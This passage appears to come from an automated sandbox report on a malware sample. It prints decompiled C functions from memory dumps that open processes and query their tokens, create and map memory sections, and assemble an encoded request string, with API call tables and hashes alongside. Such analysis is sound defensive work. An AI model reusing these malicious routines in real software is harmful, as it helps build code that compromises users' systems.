                                                                                                                                                                                                                        						NtClose(_v8); // executed
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					NtClose(_v12);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t48;
                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                        0x026f6073
                                                                                                                                                                                                                        0x026f6074
                                                                                                                                                                                                                        0x026f6075
                                                                                                                                                                                                                        0x026f6076
                                                                                                                                                                                                                        0x026f6077
                                                                                                                                                                                                                        0x026f607b
                                                                                                                                                                                                                        0x026f6082
                                                                                                                                                                                                                        0x026f6091
                                                                                                                                                                                                                        0x026f6094
                                                                                                                                                                                                                        0x026f6097
                                                                                                                                                                                                                        0x026f609e
                                                                                                                                                                                                                        0x026f60a1
                                                                                                                                                                                                                        0x026f60a4
                                                                                                                                                                                                                        0x026f60a7
                                                                                                                                                                                                                        0x026f60aa
                                                                                                                                                                                                                        0x026f60b5
                                                                                                                                                                                                                        0x026f60b7
                                                                                                                                                                                                                        0x026f60c0
                                                                                                                                                                                                                        0x026f60c8
                                                                                                                                                                                                                        0x026f60ca
                                                                                                                                                                                                                        0x026f60dc
                                                                                                                                                                                                                        0x026f60e6
                                                                                                                                                                                                                        0x026f60ea
                                                                                                                                                                                                                        0x026f60f9
                                                                                                                                                                                                                        0x026f60fd
                                                                                                                                                                                                                        0x026f6106
                                                                                                                                                                                                                        0x026f610e
                                                                                                                                                                                                                        0x026f610e
                                                                                                                                                                                                                        0x026f6110
                                                                                                                                                                                                                        0x026f6110
                                                                                                                                                                                                                        0x026f6118
                                                                                                                                                                                                                        0x026f611e
                                                                                                                                                                                                                        0x026f6122
                                                                                                                                                                                                                        0x026f6122
                                                                                                                                                                                                                        0x026f612d

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 026F60AD
                                                                                                                                                                                                                        • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 026F60C0
                                                                                                                                                                                                                        • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 026F60DC
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 026F60F9
                                                                                                                                                                                                                        • memcpy.NTDLL(?,00000000,0000001C), ref: 026F6106
                                                                                                                                                                                                                        • NtClose.NTDLL(?), ref: 026F6118
                                                                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 026F6122
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2575439697-0
                                                                                                                                                                                                                        • Opcode ID: 3012f458352872a672d10f9e496d1532949a6cd99a4a83d0b6e6f5152ff57719
                                                                                                                                                                                                                        • Instruction ID: 5563ea6839c8d3cfd974ddd3c05f6f12a2d1ac3a81f07f1fca1a92dd7ff7738a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3012f458352872a672d10f9e496d1532949a6cd99a4a83d0b6e6f5152ff57719
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A821F3B294021CBBDF41EFA5DC859DEBFBDEB08740F104026FA04A6110D7718A959BA4
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                                        			E02191E57(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                                        				int _v44;
                                                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				long _t34;
                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t48 = __eax;
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                                        				_v48 = 0x18;
                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                        				_v36 = 0x40;
                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                                                        				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                        				if(_t34 < 0) {
                                                                                                                                                                                                                        					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					 *_t48 = _v16;
                                                                                                                                                                                                                        					_t39 = E021911EA(_t48,  &_v12); // executed
                                                                                                                                                                                                                        					_t47 = _t39;
                                                                                                                                                                                                                        					if(_t47 != 0) {
                                                                                                                                                                                                                        						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						memset(_v12, 0, _v24);
                                                                                                                                                                                                                        						 *_a4 = _v12;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t47;
                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                        0x02191e60
                                                                                                                                                                                                                        0x02191e67
                                                                                                                                                                                                                        0x02191e68
                                                                                                                                                                                                                        0x02191e69
                                                                                                                                                                                                                        0x02191e6a
                                                                                                                                                                                                                        0x02191e6b
                                                                                                                                                                                                                        0x02191e7c
                                                                                                                                                                                                                        0x02191e80
                                                                                                                                                                                                                        0x02191e94
                                                                                                                                                                                                                        0x02191e97
                                                                                                                                                                                                                        0x02191e9a
                                                                                                                                                                                                                        0x02191ea1
                                                                                                                                                                                                                        0x02191ea4
                                                                                                                                                                                                                        0x02191eab
                                                                                                                                                                                                                        0x02191eae
                                                                                                                                                                                                                        0x02191eb1
                                                                                                                                                                                                                        0x02191eb4
                                                                                                                                                                                                                        0x02191eb9
                                                                                                                                                                                                                        0x02191ef4
                                                                                                                                                                                                                        0x02191ebb
                                                                                                                                                                                                                        0x02191ebe
                                                                                                                                                                                                                        0x02191ec4
                                                                                                                                                                                                                        0x02191ec9
                                                                                                                                                                                                                        0x02191ecd
                                                                                                                                                                                                                        0x02191eeb
                                                                                                                                                                                                                        0x02191ecf
                                                                                                                                                                                                                        0x02191ed6
                                                                                                                                                                                                                        0x02191ee4
                                                                                                                                                                                                                        0x02191ee4
                                                                                                                                                                                                                        0x02191ecd
                                                                                                                                                                                                                        0x02191efc

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 02191EB4
                                                                                                                                                                                                                          • Part of subcall function 021911EA: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02191EC9,00000002,00000000,?,?,00000000,?,?,02191EC9,00000002), ref: 02191217
                                                                                                                                                                                                                        • memset.NTDLL ref: 02191ED6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                        • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                        • Opcode ID: 7fc120d833c92780bbefd71088f43d077229a2744204003f70b99ebadbfa48a0
                                                                                                                                                                                                                        • Instruction ID: 254957c2afa9e1b960cc66afba8b1a0cdf93a6423472790494cf413fe997ac8d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fc120d833c92780bbefd71088f43d077229a2744204003f70b99ebadbfa48a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D221DBB6D00209AFDB11DFA9C8849EFFBB9EF48354F104469E615F7210D771AA458F60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                        			E021911EA(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                        				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                        				if(_t13 < 0) {
                                                                                                                                                                                                                        					_push(_t13);
                                                                                                                                                                                                                        					return __esi[6]();
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                        0x021911fc
                                                                                                                                                                                                                        0x02191202
                                                                                                                                                                                                                        0x02191210
                                                                                                                                                                                                                        0x02191217
                                                                                                                                                                                                                        0x0219121c
                                                                                                                                                                                                                        0x02191222
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191223
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02191EC9,00000002,00000000,?,?,00000000,?,?,02191EC9,00000002), ref: 02191217
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: SectionView
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1323581903-0
                                                                                                                                                                                                                        • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                        • Instruction ID: 4eb78df68316aeb79460977291bd22e9ba61be2e36514380ddfdb3cfb9fe9e3c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBF01CB690020DBFEB119FA5DC85CAFBBBDEB48294B104D39F552E1090D6319E488A60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                                        			E026F1000(long __eax, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				long _t47;
                                                                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                                                        				intOrPtr* _t74;
                                                                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                                        				char** _t95;
                                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                                                                        				intOrPtr* _t100;
                                                                                                                                                                                                                        				intOrPtr* _t102;
                                                                                                                                                                                                                        				intOrPtr* _t104;
                                                                                                                                                                                                                        				intOrPtr* _t106;
                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                        				int* _t111;
                                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                                        				long _t127;
                                                                                                                                                                                                                        				intOrPtr* _t128;
                                                                                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                                                                                        				intOrPtr* _t132;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t119 = __edx;
                                                                                                                                                                                                                        				_t47 = __eax;
                                                                                                                                                                                                                        				_v8 = 8;
                                                                                                                                                                                                                        				if(__eax == 0) {
                                                                                                                                                                                                                        					_t47 = GetTickCount();
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t48 =  *0x26fd018; // 0xf682eb31
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t49 =  *0x26fd014; // 0x3a87c8cd
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t50 =  *0x26fd010; // 0xd8d2f808
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t51 =  *0x26fd00c; // 0x81762942
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t52 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t2 = _t52 + 0x26fe633; // 0x74666f73
                                                                                                                                                                                                                        				_t54 = wsprintfA(_a16, _t2, 3, 0x3d132, _t51, _t50, _t49, _t48,  *0x26fd02c,  *0x26fd004, _t47);
                                                                                                                                                                                                                        				_t55 = E026F8616();
                                                                                                                                                                                                                        				_t56 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t4 = _t56 + 0x26fe673; // 0x74707526
                                                                                                                                                                                                                        				wsprintfA(_a16 + _t54, _t4, _t55);
                                                                                                                                                                                                                        				_t122 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				_t61 = E026F66DB(0x26fd00a, _t122 + 4);
                                                                                                                                                                                                                        				_t127 = 0;
                                                                                                                                                                                                                        				_v20 = _t61;
                                                                                                                                                                                                                        				if(_t61 == 0) {
                                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                                        					RtlFreeHeap( *0x26fd238, _t127, _a16); // executed
                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t64 = RtlAllocateHeap( *0x26fd238, 0, 0x800);
                                                                                                                                                                                                                        				_v16 = _t64;
                                                                                                                                                                                                                        				if(_t64 == 0) {
                                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, _t127, _v20);
                                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				E026F59B0(GetTickCount());
                                                                                                                                                                                                                        				_t68 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				__imp__(_t68 + 0x40);
                                                                                                                                                                                                                        				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                        				_t72 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				__imp__(_t72 + 0x40);
                                                                                                                                                                                                                        				_t74 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				_t124 = E026F69CF(1, _t119, _a16,  *_t74);
                                                                                                                                                                                                                        				_v28 = _t124;
                                                                                                                                                                                                                        				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                        				if(_t124 == 0) {
                                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, _t127, _v16);
                                                                                                                                                                                                                        					goto L21;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				StrTrimA(_t124, 0x26fc294);
                                                                                                                                                                                                                        				_t80 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_push(_t124);
                                                                                                                                                                                                                        				_t10 = _t80 + 0x26fe252; // 0x616d692f
                                                                                                                                                                                                                        				_t82 = E026F5FD1(_t10);
                                                                                                                                                                                                                        				_v12 = _t82;
                                                                                                                                                                                                                        				if(_t82 == 0) {
                                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, _t127, _t124);
                                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t128 = __imp__;
                                                                                                                                                                                                                        				 *_t128(_t124, _a4);
                                                                                                                                                                                                                        				_t110 = _v16;
                                                                                                                                                                                                                        				 *_t128(_t110, _v20);
                                                                                                                                                                                                                        				_t129 = __imp__;
                                                                                                                                                                                                                        				 *_t129(_t110, _v12);
                                                                                                                                                                                                                        				 *_t129(_t110, _t124);
                                                                                                                                                                                                                        				_t89 = E026FA5A3(0, _t110);
                                                                                                                                                                                                                        				_a4 = _t89;
                                                                                                                                                                                                                        				if(_t89 == 0) {
                                                                                                                                                                                                                        					_v8 = 8;
                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                        					E026F5225();
                                                                                                                                                                                                                        					L18:
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, 0, _v12);
                                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t93 = E026F1297(_t110, 0xffffffffffffffff, _t124,  &_v24); // executed
                                                                                                                                                                                                                        				_t111 = _a12;
                                                                                                                                                                                                                        				_v8 = _t93;
                                                                                                                                                                                                                        				if(_t93 == 0) {
                                                                                                                                                                                                                        					_t132 = _v24;
                                                                                                                                                                                                                        					_t99 = E026F3DCD(_t132, _a4, _a8, _t111); // executed
                                                                                                                                                                                                                        					_v8 = _t99;
                                                                                                                                                                                                                        					_t100 =  *((intOrPtr*)(_t132 + 8));
                                                                                                                                                                                                                        					 *((intOrPtr*)( *_t100 + 0x80))(_t100);
                                                                                                                                                                                                                        					_t102 =  *((intOrPtr*)(_t132 + 8));
                                                                                                                                                                                                                        					 *((intOrPtr*)( *_t102 + 8))(_t102);
                                                                                                                                                                                                                        					_t104 =  *((intOrPtr*)(_t132 + 4));
                                                                                                                                                                                                                        					 *((intOrPtr*)( *_t104 + 8))(_t104);
                                                                                                                                                                                                                        					_t106 =  *_t132;
                                                                                                                                                                                                                        					 *((intOrPtr*)( *_t106 + 8))(_t106);
                                                                                                                                                                                                                        					E026F45B3(_t132);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_v8 != 0x10d2) {
                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                        					if(_v8 == 0) {
                                                                                                                                                                                                                        						_t95 = _a8;
                                                                                                                                                                                                                        						if(_t95 != 0) {
                                                                                                                                                                                                                        							_t130 =  *_t111;
                                                                                                                                                                                                                        							_t125 =  *_t95;
                                                                                                                                                                                                                        							wcstombs( *_t95,  *_t95,  *_t111);
                                                                                                                                                                                                                        							_t97 = E026F4725(_t125, _t125, _t130 >> 1);
                                                                                                                                                                                                                        							_t124 = _v28;
                                                                                                                                                                                                                        							 *_t111 = _t97;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                                        						E026F45B3(_a4);
                                                                                                                                                                                                                        						if(_v8 == 0 || _v8 == 0x10d2) {
                                                                                                                                                                                                                        							goto L18;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}













































                                                                                                                                                                                                                        0x026f1000
                                                                                                                                                                                                                        0x026f1000
                                                                                                                                                                                                                        0x026f100f
                                                                                                                                                                                                                        0x026f1018
                                                                                                                                                                                                                        0x026f101a
                                                                                                                                                                                                                        0x026f101a
                                                                                                                                                                                                                        0x026f1023
                                                                                                                                                                                                                        0x026f102e
                                                                                                                                                                                                                        0x026f1031
                                                                                                                                                                                                                        0x026f103c
                                                                                                                                                                                                                        0x026f103f
                                                                                                                                                                                                                        0x026f1044
                                                                                                                                                                                                                        0x026f1047
                                                                                                                                                                                                                        0x026f104c
                                                                                                                                                                                                                        0x026f104f
                                                                                                                                                                                                                        0x026f105b
                                                                                                                                                                                                                        0x026f1065
                                                                                                                                                                                                                        0x026f106c
                                                                                                                                                                                                                        0x026f1072
                                                                                                                                                                                                                        0x026f1077
                                                                                                                                                                                                                        0x026f1084
                                                                                                                                                                                                                        0x026f1086
                                                                                                                                                                                                                        0x026f1097
                                                                                                                                                                                                                        0x026f109c
                                                                                                                                                                                                                        0x026f109e
                                                                                                                                                                                                                        0x026f10a3
                                                                                                                                                                                                                        0x026f1274
                                                                                                                                                                                                                        0x026f127e
                                                                                                                                                                                                                        0x026f128b
                                                                                                                                                                                                                        0x026f128b
                                                                                                                                                                                                                        0x026f10b5
                                                                                                                                                                                                                        0x026f10bb
                                                                                                                                                                                                                        0x026f10c0
                                                                                                                                                                                                                        0x026f1264
                                                                                                                                                                                                                        0x026f126e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f126e
                                                                                                                                                                                                                        0x026f10c8
                                                                                                                                                                                                                        0x026f10cd
                                                                                                                                                                                                                        0x026f10d6
                                                                                                                                                                                                                        0x026f10e7
                                                                                                                                                                                                                        0x026f10eb
                                                                                                                                                                                                                        0x026f10f4
                                                                                                                                                                                                                        0x026f10fa
                                                                                                                                                                                                                        0x026f1109
                                                                                                                                                                                                                        0x026f1110
                                                                                                                                                                                                                        0x026f1119
                                                                                                                                                                                                                        0x026f111f
                                                                                                                                                                                                                        0x026f1254
                                                                                                                                                                                                                        0x026f125e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f125e
                                                                                                                                                                                                                        0x026f112b
                                                                                                                                                                                                                        0x026f1131
                                                                                                                                                                                                                        0x026f1136
                                                                                                                                                                                                                        0x026f1137
                                                                                                                                                                                                                        0x026f113e
                                                                                                                                                                                                                        0x026f1143
                                                                                                                                                                                                                        0x026f1148
                                                                                                                                                                                                                        0x026f1246
                                                                                                                                                                                                                        0x026f124e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f124e
                                                                                                                                                                                                                        0x026f1151
                                                                                                                                                                                                                        0x026f1158
                                                                                                                                                                                                                        0x026f115d
                                                                                                                                                                                                                        0x026f1161
                                                                                                                                                                                                                        0x026f1166
                                                                                                                                                                                                                        0x026f116d
                                                                                                                                                                                                                        0x026f1171
                                                                                                                                                                                                                        0x026f1176
                                                                                                                                                                                                                        0x026f117b
                                                                                                                                                                                                                        0x026f1180
                                                                                                                                                                                                                        0x026f128e
                                                                                                                                                                                                                        0x026f122e
                                                                                                                                                                                                                        0x026f122e
                                                                                                                                                                                                                        0x026f1233
                                                                                                                                                                                                                        0x026f123e
                                                                                                                                                                                                                        0x026f1244
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f1244
                                                                                                                                                                                                                        0x026f118a
                                                                                                                                                                                                                        0x026f118f
                                                                                                                                                                                                                        0x026f1192
                                                                                                                                                                                                                        0x026f1197
                                                                                                                                                                                                                        0x026f1199
                                                                                                                                                                                                                        0x026f11a5
                                                                                                                                                                                                                        0x026f11aa
                                                                                                                                                                                                                        0x026f11ad
                                                                                                                                                                                                                        0x026f11b3
                                                                                                                                                                                                                        0x026f11b9
                                                                                                                                                                                                                        0x026f11bf
                                                                                                                                                                                                                        0x026f11c2
                                                                                                                                                                                                                        0x026f11c8
                                                                                                                                                                                                                        0x026f11cb
                                                                                                                                                                                                                        0x026f11d0
                                                                                                                                                                                                                        0x026f11d4
                                                                                                                                                                                                                        0x026f11d4
                                                                                                                                                                                                                        0x026f11e0
                                                                                                                                                                                                                        0x026f11ec
                                                                                                                                                                                                                        0x026f11f0
                                                                                                                                                                                                                        0x026f11f2
                                                                                                                                                                                                                        0x026f11f7
                                                                                                                                                                                                                        0x026f11f9
                                                                                                                                                                                                                        0x026f11fb
                                                                                                                                                                                                                        0x026f1200
                                                                                                                                                                                                                        0x026f120d
                                                                                                                                                                                                                        0x026f1212
                                                                                                                                                                                                                        0x026f1215
                                                                                                                                                                                                                        0x026f1215
                                                                                                                                                                                                                        0x026f11f7
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f11e2
                                                                                                                                                                                                                        0x026f11e6
                                                                                                                                                                                                                        0x026f1217
                                                                                                                                                                                                                        0x026f121a
                                                                                                                                                                                                                        0x026f1223
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f1223
                                                                                                                                                                                                                        0x026f11e8
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f11e8

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 026F101A
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F1065
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F1084
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 026F10B5
                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 026F10C6
                                                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(04B39570), ref: 026F10D6
                                                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(04B39570), ref: 026F10F4
                                                                                                                                                                                                                        • StrTrimA.SHLWAPI(00000000,026FC294,?,04B395B0), ref: 026F112B
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 026F1158
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,?), ref: 026F1161
                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 026F116D
                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 026F1171
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: lstrlen.KERNEL32(?,00000000,026FD330,00000001,026F453C,026FD00C,026FD00C,00000000,00000005,00000000,00000000,?,?,?,026F857A,?), ref: 026FA5AC
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: mbstowcs.NTDLL ref: 026FA5D3
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: memset.NTDLL ref: 026FA5E5
                                                                                                                                                                                                                        • wcstombs.NTDLL ref: 026F1200
                                                                                                                                                                                                                          • Part of subcall function 026F3DCD: SysAllocString.OLEAUT32(?), ref: 026F3E08
                                                                                                                                                                                                                          • Part of subcall function 026F3DCD: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 026F3E8B
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 026F123E
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 026F124E
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,04B395B0), ref: 026F125E
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 026F126E
